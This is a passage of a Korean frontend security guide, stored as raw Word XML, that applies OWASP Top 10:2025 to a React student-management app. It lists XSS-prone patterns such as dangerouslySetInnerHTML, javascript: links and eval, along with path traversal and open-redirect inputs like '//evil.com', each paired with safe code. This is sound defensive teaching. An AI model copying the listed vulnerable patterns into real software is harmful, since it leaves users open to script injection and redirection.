          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="9C2A1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;td&gt;{student.detail?.address}&lt;/td&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">)에서는 ③이 실패하고 태그가 글자 그대로 보인다. 위험한 것은 이 보호를 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>끄거나 우회하는 아래 6가지 경우</w:t>
      </w:r>
      <w:r>
        <w:t>다. 이 프로젝트에는 dangerouslySetInnerHTML·innerHTML이 없다(src/ 검색으로 확인).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2437"/>
        <w:gridCol w:w="2707"/>
        <w:gridCol w:w="2529"/>
      </w:tblGrid>
      <w:tr w:rsidR="00275A50">
        <w:trPr>
          <w:tblHeader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경우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위험한 코드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무슨 일이 생기나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안전한 방법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① HTML 직접 넣기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&lt;td dangerouslySetInnerHTML={{ __html: address }} /&gt;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중괄호 보호를 끈다 → 위 ③이 성공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{address}로 글자 출력(줄바꿈은 CSS pre-line). 꼭 필요하면 DOMPurify.sanitize()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② 링크 주소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&lt;a href={student.homepage}&gt;</w:t>
            </w:r>
          </w:p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값: javascript:…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링크를 누르면 이동이 아니라 코드 실행. escape는 속성 값의 의미까지 검사하지 않는다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http/https만 허용(아래 toSafeUrl)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③ 문자열 실행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eval(input)</w:t>
            </w:r>
          </w:p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Function(…)</w:t>
            </w:r>
          </w:p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setTimeout("load()")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문자열이 그대로 자바스크립트로 실행된다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함수를 직접 넘긴다: setTimeout(load). 데이터는 JSON.parse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④ DOM 직접 조작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ref.current.innerHTML = msg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React를 거치지 않아 보호가 없다 → ①과 같다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textContent, 또는 상태값 + { }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⑤ Markdown·에디터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marked.parse(memo)를 그대로 HTML로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marked는 위험한 HTML을 걸러 주지 않는다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DOMPurify로 정제. react-markdown에 rehype-raw를 붙이지 않는다</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00275A50">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="135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⑥ 외부 스크립트</w:t>
            </w:r>
          </w:p>
        </w:tc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&lt;script src="…/widget.js"&gt; (버전·검증 없음)</w:t>
            </w:r>
          </w:p>
        </w:tc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우리 앱과 같은 권한으로 실행 → 토큰을 읽는다. 제공사가 해킹되면 같이 당한다</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="25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B3C6E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꼭 필요한 것만. 버전 고정 + integrity(SRI)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Bdr>
          <w:top w:val="single" w:sz="2" w:space="4" w:color="95C49B"/>
          <w:left w:val="single" w:sz="2" w:space="4" w:color="95C49B"/>
          <w:bottom w:val="single" w:sz="2" w:space="4" w:color="95C49B"/>
          <w:right w:val="single" w:sz="2" w:space="4" w:color="95C49B"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="EAF5EB"/>
        <w:spacing w:before="80" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D6A35"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>// [안전한 코드] ② 링크: http:// 또는 https:// 주소만 통과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toSafeUrl = (url)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try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const u = new URL(url, window.location.origin);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['http:', 'https:'].includes(u.protocol) ? u.href : '#';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 catch { return '#';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// ①·⑤ 꼭 HTML을 그려야 할 때: 실행되는 부분(&lt;script&gt;, onerror= 등)을 걷어낸 뒤 넣는다</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>import DOMPurify from 'dompurify';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&lt;div dangerouslySetInnerHTML={{ __html: DOMPurify.sanitize(html) }} /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC19AC" w:rsidRDefault="00CA1CCE">
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>마지막 안전망 — CSP</w:t>
      </w:r>
      <w:r>
        <w:t>: 배포 서버에서 script-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 'self'(서버 스크립트만 실행 → onerror 같은 인라인 코드 차단)와 connect-src(정해진 서버로만 요청 → 토큰 전송 차단)를 설정한다(4-10). 구멍을 메우는 것이 아니라 피해를 줄이는 두 번째 방어선이다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC19AC" w:rsidRDefault="00CA1CCE">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>4-3. CSRF — 이 앱에서 상대적으로 덜 위험한 이유와 그 조건 [A01]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4"/>
        <w:gridCol w:w="6902"/>
      </w:tblGrid>
      <w:tr w:rsidR="00275A50" w:rsidTr="00B3444E">
        <w:trPr>
          <w:tblHeader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75A50" w:rsidTr="00B3444E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지금 덜 위험한 이유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CSRF는 브라우저가 쿠키를 자동으로 붙이는 점을 악용한다. 이 앱은 토큰을 Authorization 헤더에 직접 담으므로(client.js), 공격 사이트가 &lt;form&gt;·&lt;img&gt;로 요청을 보내도 피해자의 토큰이 실리지 않는다</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00275A50" w:rsidTr="00B3444E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다시 위험해지는 조건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① XSS로 토큰 자체를 훔치는 경우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② refreshToken을 쿠키로 옮기는 경우 → SameSite 설정과 CSRF 토큰이 필요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③ 4-4의 경로 조작 — 앱이 스스로 토큰을 붙여 공격자가 고른 주소로 요청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4-4. URL 경로와 파라미터를 문자열로 이어 붙이지 않는다 [A01 · A05]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC19AC" w:rsidRDefault="00CA1CCE">
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">화면 주소(/students/:id/edit)의 값을 그대로 API 경로에 붙이면, 공격자가 만든 링크로 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>피해자의 브라우저가 피해자의 토큰을 붙여 엉뚱한 API를 호출</w:t>
      </w:r>
      <w:r>
        <w:t>할 수 있다(Client-Side Path Traversal). id 자리의 ../ 가 상위 경로로 정규화되고, 사용자가 "수정"을 누르면 PUT까지 나간다.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4062"/>
      </w:tblGrid>
      <w:tr w:rsidR="00275A50">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="49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  <w:tc>
          <w:tcPr>
            <w:tcW w:w="40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이 앱의 상태</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00275A50">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="49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쿼리는 axios params로 넘긴다</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="40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적용됨 — studentApi.js 페이징·검색</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00275A50">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="49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경로값은 encodeURIComponent로 인코딩한다</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="40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미적용 — fetchStudent·updateStudent·deleteStudent 모두 id를 그대로 붙임(아래 7-2 #3 참고)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00275A50">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="49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형식이 정해진 값(숫자 id)은 보내기 전에 검사한다</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="40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미적용 — 아래처럼 개선(7-2 #3)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Bdr>
          <w:top w:val="single" w:sz="2" w:space="4" w:color="95C49B"/>
          <w:left w:val="single" w:sz="2" w:space="4" w:color="95C49B"/>
          <w:bottom w:val="single" w:sz="2" w:space="4" w:color="95C49B"/>
          <w:right w:val="single" w:sz="2" w:space="4" w:color="95C49B"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="EAF5EB"/>
        <w:spacing w:before="80" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D6A35"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>// [안전한 코드] studentApi.js — updateStudent · deleteStudent도 같은 방식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toId = (id)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(!/^\d+$/.test(String(id))) throw new Error('잘못된 학생 id 입니다.');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return encodeURIComponent(id);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};</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>export const fetchStudent = async (id) =&gt; (await client.get(`${STUDENTS_PATH}/${toId(id)}`)).data;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC19AC" w:rsidRDefault="00CA1CCE">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>4-5. 로그인 후 이동 주소는 내부 경로만 허용한다 — 오픈 리다이렉트 [A01]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC19AC" w:rsidRDefault="00CA1CCE">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">로그인 직후 이동할 주소가 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>이 사이트 안의 경로일 때만</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 그곳으로 보내고, 아니면 기본 화면(/students)으로 보낸다. 로그인 직후 피싱 사이트로 보내는 공격을 막는 검사다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC19AC" w:rsidRDefault="00CA1CCE">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="2" w:space="4" w:color="BFBFBF"/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const isSafePath = (path) =&gt;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typeof path === 'string' &amp;&amp; path.startsWith('/') &amp;&amp; !path.startsWith('//') &amp;&amp; !path.startsWith('/\\');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const from = isSafePath(location.state?.from) ? location.state.from : DEFAULT_AFTER_LOGIN;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3881"/>
        <w:gridCol w:w="2708"/>
      </w:tblGrid>
      <w:tr w:rsidR="00275A50">
        <w:trPr>
          <w:tblHeader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조건</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="38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왜 필요한가</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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통과 / 차단 예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typeof path === 'string'</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="38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값이 없거나 문자열이 아니면 거른다</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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undefined → 차단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startsWith('/')</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="38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"/"로 시작해야 사이트 내부 경로다</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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/students/3/edit → 통과</w:t>
            </w:r>
          </w:p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https://evil.com → 차단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!startsWith('//')</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="38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브라우저는 //evil.com을 외부 사이트 주소로 해석한다</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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//evil.com → 차단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!startsWith('/\\')</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="38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브라우저는 \를 /처럼 취급한다(코드의 \\는 \ 한 글자)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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/\evil.com → 차단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spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:t>지금은 history state로 받아 외부에서 조작하기 어렵지만, 나중에 ?redirect= 쿼리 방식으로 바꿔도 안전하도록 미리 넣어 둔다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC19AC" w:rsidRDefault="00CA1CCE">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>4-6. 오류 처리와 로그 — 민감정보를 남기지 않고, 실패하면 닫힌 쪽으로 [A09 · A10]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6589"/>
      </w:tblGrid>
      <w:tr w:rsidR="00275A50">
        <w:trPr>
          <w:tblHeader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이유 · 방법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민감정보를 로그에 남기지 않는다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비밀번호·토큰·개인정보는 console.log 하지 않는다. 콘솔은 누구나 열 수 있고 공용 PC·화면 공유·오류 수집 도구로 옮겨 간다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axios 오류를 통째로 찍지 않는다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config.headers.Authorization(accessToken), config.data(비밀번호·refreshToken)가 들어 있다 → error.message, error.response?.status만 남긴다. 이 앱은 대부분 client.js가 새로 만든 Error만 찍어 안전하다(예외: 7-2 #2)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 정보를 화면에 내지 않는다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화면에는 사용자용 문구만. 스택트레이스·쿼리 등은 서버 로그에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빌드에서 console을 없앤다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vite.config.js의 esbuild.drop (아래 코드)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실패는 닫힌 쪽으로 (A10)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예외가 나면 "일단 보여 준다"가 아니라 "권한 없음/로그아웃"으로. 이 앱: roles ?? [], selectIsAdmin ?? false, restore() 실패 시 토큰 삭제, 갱신 실패 시 두 토큰 삭제. 추가 권장: 최상위 Error Boundary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Bdr>
          <w:top w:val="single" w:sz="2" w:space="4" w:color="95C49B"/>
          <w:left w:val="single" w:sz="2" w:space="4" w:color="95C49B"/>
          <w:bottom w:val="single" w:sz="2" w:space="4" w:color="95C49B"/>
          <w:right w:val="single" w:sz="2" w:space="4" w:color="95C49B"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="EAF5EB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// vite.config.js — 운영 빌드에서 console.* / debugger 제거</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>export default defineConfig(({ mode }) =&gt; ({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plugins: [react()],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esbuild: { drop: mode === 'production' ? ['console', 'debugger'] : [] },</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>}));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC19AC" w:rsidRDefault="00CA1CCE">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>4-7. 인증 화면(로그인·회원가입) [A07]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6589"/>
      </w:tblGrid>
      <w:tr w:rsidR="00275A50">
        <w:trPr>
          <w:tblHeader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이유 · 방법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계정 존재 여부를 드러내지 않는다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"없는 이메일"과 "틀린 비밀번호"를 구분하면 가입 이메일을 수집할 수 있다 → 서버 문구("자격 증명에 실패하였습니다")를 그대로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잠금은 서버가 한다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5회 실패 → 5분 잠금 메시지를 그대로 보여 준다. 클라이언트에서 횟수를 세지 않는다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비밀번호 칸 속성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type="password", autoComplete="current-password" / "new-password" (적용됨)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비밀번호 보관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입력 폼의 지역 상태에만. store·sessionStorage·URL 금지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제출 중 버튼 잠금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중복 요청 방지(적용됨). 무차별 대입 방어는 서버의 잠금·속도 제한 몫</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00275A50">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="24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비밀번호 정책</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="65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서버의 "4자 이상"은 수업용. 운영은 서버 정책을 강화하고 프론트는 안내만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4-8. 빌드 결과물·환경변수·소스맵 [A02]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1"/>
      </w:tblGrid>
      <w:tr w:rsidR="00275A50">
        <w:trPr>
          <w:tblHeader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VITE_* 환경변수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빌드 시 번들에 문자열로 박힌다 → 서버 주소처럼 공개돼도 되는 값만. API 키·DB 비밀번호·JWT 서명 키 금지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.env.local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.gitignore에 넣는다. 한 번 커밋된 비밀은 git 기록에 남으므로 즉시 폐기·재발급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소스맵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운영에 공개하지 않는다(build.sourcemap: false, 필요하면 "hidden"으로 오류 수집 서버에만)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개발용 설정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localhost 주소·테스트 계정 안내·디버그 화면은 모드별 설정으로 분리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4-9. 의존성과 공급망 [A03 · A08]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1"/>
      </w:tblGrid>
      <w:tr w:rsidR="00275A50">
        <w:trPr>
          <w:tblHeader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lockfile + npm ci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package-lock.json을 커밋하고, CI·배포는 npm ci로 잠긴 버전 그대로 설치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npm audit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알려진 취약점을 정기 확인(또는 Dependabot). 경고를 무시하지 않는다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새 패키지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이름 오타(axois 같은 타이포스쿼팅), 다운로드 수, 유지보수 상태, postinstall 스크립트 확인</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00275A50">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr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CDN 스크립트</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="70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버전 고정 + SRI(integrity 속성)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4-10. 배포 서버의 보안 헤더와 HTTPS [A02 · A04]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC19AC" w:rsidRDefault="00CA1CCE">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>빌드된 dist/를 내려 주는 서버(nginx, S3+CloudFront 등)에서 설정한다. 코드 수정 없이 한 겹 더 막는다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC19AC" w:rsidRDefault="00CA1CCE">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="2" w:space="4" w:color="BFBFBF"/>
          <w:left w:val="single" w:sz="2" w:space="4" w:color="BFBFBF"/>
          <w:bottom w:val="single" w:sz="2" w:space="4" w:color="BFBFBF"/>
          <w:right w:val="single" w:sz="2" w:space="4" w:color="BFBFBF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# nginx 예시 — connect-src 에 실제 API 주소를 넣는다</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>add_header Content-Security-Policy "default-src 'self'; script-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' data:; connect-src 'self' https://api.example.com; object-src 'none'; base-uri 'self'; form-action 'self'; frame-ancestors 'none'" always;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>add_header X-Content-Type-Options "nosniff" always;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>add_header Referrer-Policy "strict-origin-when-cross-origin" always;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>add_header Strict-Transport-Security "max-age=31536000; includeSubDomains" always;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>add_header Permissions-Policy "camera=(), microphone=(), geolocation=()" always;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7"/>
        <w:gridCol w:w="6319"/>
      </w:tblGrid>
      <w:tr w:rsidR="00275A50">
        <w:trPr>
          <w:tblHeader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막는 것</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00275A50">
        <w:trPr>
          <w:cantSplit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Content-Security-Policy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허용한 스크립트·연결만 허용해 XSS 피해를 줄인다. frame-ancestors 'none'은 iframe에 넣어 몰래 클릭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시키는 클릭재킹을 막는다</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00275A50">
        <w:trPr>
          <w:cantSplit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X-Content-Type-Options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브라우저가 파일 형식을 추측해 스크립트로 실행하는 것을 막는다</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00275A50">
        <w:trPr>
          <w:cantSplit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Referrer-Policy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다른 사이트로 이동할 때 주소 전체가 새는 것을 막는다</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00275A50">
        <w:trPr>
          <w:cantSplit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Strict-Transport-Security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HTTPS만 쓰게 강제한다(HTTP에서는 Authorization 헤더의 토큰이 네트워크에서 그대로 보인다)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00275A50">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="27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Permissions-Policy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6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카메라·마이크·위치 등 쓰지 않는 기능을 끈다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t>4-11. CORS를 바르게 이해한다 [A02]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC19AC" w:rsidRDefault="00CA1CCE">
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">CORS는 서버가 "어느 출처의 웹 페이지가 응답을 읽어도 되는지" 브라우저에 알려 주는 규칙일 뿐 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>접근 제어가 아니다</w:t>
      </w:r>
      <w:r>
        <w:t>(curl·Burp는 무관하다). 개발 중 CORS 오류는 서버 허용 Origin 추가(app.cors.allowed-origins)나 Vite server.proxy로 해결하고, 브라우저 보안 끄기나 서버 "*" 전체 허용으로 "해결"하지 않는다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC19AC" w:rsidRDefault="00CA1CCE">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>4-12. 개인정보(PII)를 화면과 메모리에 필요 이상 남기지 않는다 [A01 · A04]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70"/>
      </w:tblGrid>
      <w:tr w:rsidR="00275A50">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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규칙</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00275A50">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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화면 표시</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="67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주소·전화번호·이메일·생년월일은 필요한 화면에서만. 목록은 마스킹(010-****-5678) 고려</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00275A50">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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lastRenderedPageBreak/>
              <w:t>화면에서 걸러 숨기기 금지</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="67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전체를 받아 일부만 보여도 네트워크 탭에는 전부 보인다 → 서버가 필요한 데이터만 응답(학과 단건 조회가 PII를 빼는 것이 좋은 예)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00275A50">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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저장소 캐시 금지</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="67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PII를 sessionStorage/localStorage에 두지 않는다</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00275A50">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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로그아웃 시 초기화</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="67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sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>모든 store를 reset — 같은 탭의 다음 사용자에게 이전 데이터가 남지 않게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1"/>
        <w:pageBreakBefore/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>5. OWASP Top 10:2025 기반 프론트엔드 보안 원칙</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC19AC" w:rsidRDefault="00CA1CCE">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>5-1. OWASP 번호 읽는 법</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC19AC" w:rsidRDefault="00CA1CCE">
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">OWASP Top 10은 OWASP(Open Worldwide Application Security Project)가 몇 년마다 발표하는 웹 애플리케이션 10대 보안 위험 목록이며, 이 문서는 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2025판</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 기준이다.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4"/>
        <w:gridCol w:w="7402"/>
      </w:tblGrid>
      <w:tr w:rsidR="00275A50">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="16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75A50">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="16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표기</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7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A01:2025 = 2025판의 1번 항목. 이 문서는 연도를 생략해 A01~A10으로 쓴다(이전 문서의 "#1"도 같은 뜻)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00275A50">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="16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번호의 의미</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7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위험도 순위. 실제 취약점 데이터로 8개, 커뮤니티 설문으로 2개를 정한다. 뒤 번호라고 덜 중요한 것은 아니다</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00275A50">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="16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판이 바뀌면</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7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번호도 바뀐다(인젝션: 2021판 A03 → 2025판 A05). 인용할 때는 "A05:2025 인젝션"처럼 연도와 이름을 함께 쓴다</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00EC19AC" w:rsidRDefault="00EC19A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3159"/>
        <w:gridCol w:w="2346"/>
        <w:gridCol w:w="2709"/>
      </w:tblGrid>
